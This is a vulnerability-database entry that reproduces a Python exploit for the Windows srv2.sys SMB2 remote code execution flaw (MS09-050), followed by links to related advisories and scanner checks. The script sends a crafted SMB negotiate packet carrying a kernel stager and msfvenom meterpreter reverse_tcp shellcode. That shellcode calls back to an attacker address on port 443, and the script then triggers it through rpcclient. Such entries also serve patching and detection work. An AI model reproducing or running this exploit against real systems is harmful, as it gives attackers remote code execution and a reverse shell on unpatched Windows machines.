Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtOhnozzy1337DAY-ID-25384
HistoryFeb 26, 2016 - 12:00 a.m.

Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050) Exploit

2016-02-2600:00:00
ohnozzy
0day.today
2009

0.973 High

EPSS

Percentile

99.9%

JSON

Exploit for windows platform in category remote exploits

# EDB-Note: Source ~ https://raw.githubusercontent.com/ohnozzy/Exploit/master/MS09_050.py
 
#!/usr/bin/python
#This module depends on the linux command line program smbclient. 
#I can't find a python smb library for smb login. If you can find one, you can replace that part of the code with the smb login function in python.
#The idea is that after the evil payload is injected by the first packet, it need to be trigger by an authentication event. Whether the authentication successes or not does not matter.
import tempfile
import sys
import subprocess
from socket import socket
from time import sleep
from smb.SMBConnection import SMBConnection
 
 
try:
 
    target = sys.argv[1]
except IndexError:
    print '\nUsage: %s <target ip>\n' % sys.argv[0]
    print 'Example: MS36299.py 192.168.1.1 1\n'
    sys.exit(-1)
 
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.77 LPORT=443  EXITFUNC=thread  -f python
shell =  ""
shell += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"   #fce8820000006089e531c0648b
shell += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
shell += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
shell += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
shell += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
shell += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
shell += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
shell += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
shell += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
shell += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
shell += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
shell += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
shell += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
shell += "\xff\xd5\x6a\x05\x68\xc0\xa8\x1e\x4d\x68\x02\x00\x01"
shell += "\xbb\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
shell += "\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
shell += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec"
shell += "\xe8\x61\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02"
shell += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a"
shell += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
shell += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
shell += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00\x40"
shell += "\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57"
shell += "\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9"
shell += "\x71\xff\xff\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xe0"
shell += "\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"
shell += "\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00"
shell += "\x53\xff\xd5"
 
 
 
host = target, 445
 
buff ="\x00\x00\x03\x9e\xff\x53\x4d\x42"
buff+="\x72\x00\x00\x00\x00\x18\x53\xc8"
buff+="\x17\x02" #high process ID
buff+="\x00\xe9\x58\x01\x00\x00"
buff+="\x00\x00\x00\x00\x00\x00\x00\x00"
buff+="\x00\x00\xfe\xda\x00\x7b\x03\x02"
buff+="\x04\x0d\xdf\xff"*25
buff+="\x00\x02\x53\x4d"
buff+="\x42\x20\x32\x2e\x30\x30\x32\x00"
buff+="\x00\x00\x00\x00"*37
buff+="\xff\xff\xff\xff"*2
buff+="\x42\x42\x42\x42"*7
buff+="\xb4\xff\xff\x3f" #magic index
buff+="\x41\x41\x41\x41"*6
buff+="\x09\x0d\xd0\xff" #return address
 
#stager_sysenter_hook from metasploit
 
buff+="\xfc\xfa\xeb\x1e\x5e\x68\x76\x01"
buff+="\x00\x00\x59\x0f\x32\x89\x46\x5d"
buff+="\x8b\x7e\x61\x89\xf8\x0f\x30\xb9"
buff+="\x16\x02\x00\x00\xf3\xa4\xfb\xf4"
buff+="\xeb\xfd\xe8\xdd\xff\xff\xff\x6a"
buff+="\x00\x9c\x60\xe8\x00\x00\x00\x00"
buff+="\x58\x8b\x58\x54\x89\x5c\x24\x24"
buff+="\x81\xf9\xde\xc0\xad\xde\x75\x10"
buff+="\x68\x76\x01\x00\x00\x59\x89\xd8"
buff+="\x31\xd2\x0f\x30\x31\xc0\xeb\x31"
buff+="\x8b\x32\x0f\xb6\x1e\x66\x81\xfb"
buff+="\xc3\x00\x75\x25\x8b\x58\x5c\x8d"
buff+="\x5b\x69\x89\x1a\xb8\x01\x00\x00"
buff+="\x80\x0f\xa2\x81\xe2\x00\x00\x10"
buff+="\x00\x74\x0e\xba\x00\xff\x3f\xc0"
buff+="\x83\xc2\x04\x81\x22\xff\xff\xff"
buff+="\x7f\x61\x9d\xc3\xff\xff\xff\xff"
buff+="\x00\x04\xdf\xff\x00\x04\xfe\x7f"
buff+="\x60\x6a\x30\x58\x99\x64\x8b\x18"
buff+="\x39\x53\x0c\x74\x2b\x8b\x43\x10"
buff+="\x8b\x40\x3c\x83\xc0\x28\x8b\x08"
buff+="\x03\x48\x03\x81\xf9\x6c\x61\x73"
buff+="\x73\x75\x15\xe8\x07\x00\x00\x00"
buff+="\xe8\x0d\x00\x00\x00\xeb\x09\xb9"
buff+="\xde\xc0\xad\xde\x89\xe2\x0f\x34"
buff+="\x61\xc3\x81\xc4\x54\xf2\xff\xff"
 
buff+=shell
 
s = socket()
s.connect(host)
s.send(buff)
s.close() 
#Trigger the above injected code via authenticated process.
subprocess.call("echo '1223456' | rpcclient -U Administrator %s"%(target), shell=True)

#  0day.today [2018-02-20]  #

Related

openvas 9
securityvulns 1
nessus 2
checkpoint_advisories 3
canvas 2
saint 4
threatpost 2
cert 1
packetstorm 2
seebug 3
cve 3
prion 3
nmap 1
openvas
openvas
Microsoft Windows SMB2 Negotiation Protocol Remote Code Execution Vulnerability
2009-10-15 00:00:00
Microsoft Windows SMB2 '_Smb2ValidateProviderCallback()' Remote Code Execution Vulnerability
2009-10-01 00:00:00
Nmap NSE: SMB Check Vulnerabilities
2010-09-23 00:00:00
securityvulns
securityvulns
Microsoft Security Bulletin MS09-050 - Critical Vulnerabilities in SMBv2 Could Allow Remote Code Execution &#40;975517&#41;
2009-10-13 00:00:00
nessus
nessus
MS09-050: Vulnerabilities in SMBv2 Could Allow Remote Code Execution (975517) (EDUCATEDSCHOLAR)
2009-10-13 00:00:00
MS09-050: Microsoft Windows SMB2 _Smb2ValidateProviderCallback() Vulnerability (975497) (EDUCATEDSCHOLAR) (uncredentialed check)
2009-09-08 00:00:00
checkpoint_advisories
checkpoint_advisories
Microsoft Windows SMB Negotiate Request Remote Code Execution (CVE-2009-2532; CVE-2009-3103)
2009-09-09 00:00:00
Microsoft Windows Server Remote Code Execution (CVE-2009-3103)
2021-05-30 00:00:00
Microsoft SMB Infinite Loop Denial of Service (MS09-050; CVE-2009-2526)
2009-10-13 00:00:00
canvas
canvas
Immunity Canvas: SMB2_NEGOTIATE_LOCAL
2009-09-08 22:30:00
Immunity Canvas: SMB2_NEGOTIATE_REMOTE
2009-09-08 18:30:00
saint
saint
Windows SMB2 buffer overflow
2010-09-20 00:00:00
Windows SMB2 buffer overflow
2010-09-20 00:00:00
Windows SMB2 buffer overflow
2010-09-20 00:00:00
threatpost
threatpost
Microsoft Ships Temporary Fix-It for Critical Vista Flaw
2009-09-23 22:39:03
Microsoft Confirms SMB2 Flaw, Heightens Severity
2009-09-11 12:12:04
cert
cert
Windows SMB version 2 vulnerability
2009-09-10 00:00:00
packetstorm
packetstorm
Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
2009-09-29 00:00:00
Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
2010-02-26 00:00:00
seebug
seebug
Microsoft Windows SMBv2ๅๅ•†่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒๆผๆดž(MS09-050)
2009-10-14 00:00:00
Microsoft Windows SMB2ๅ‘ฝไปคๅ€ผ่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒๆผๆดž(MS09-050)
2009-10-14 00:00:00
Microsoft Windows SMB2ๅญ—ๆฎตๆ ก้ชŒ่ฟœ็จ‹ๆ‹’็ปๆœๅŠกๆผๆดž(MS09-050)
2009-10-14 00:00:00
cve
cve
CVE-2009-2532
2009-10-14 10:30:00
CVE-2009-3103
2009-09-08 22:30:00
CVE-2009-2526
2009-10-14 10:30:00
prion
prion
Out-of-bounds
2009-09-08 22:30:00
Design/Logic Flaw
2009-10-14 10:30:00
Code injection
2009-10-14 10:30:00
nmap
nmap
smb-vuln-cve2009-3103 NSE Script
2015-10-03 06:07:49

0.973 High

EPSS

Percentile

99.9%

JSON
Related for 1337DAY-ID-25384
openvas9securityvulns1nessus2checkpoint_advisories3canvas2saint4threatpost2cert1packetstorm2seebug3cve3prion3nmap1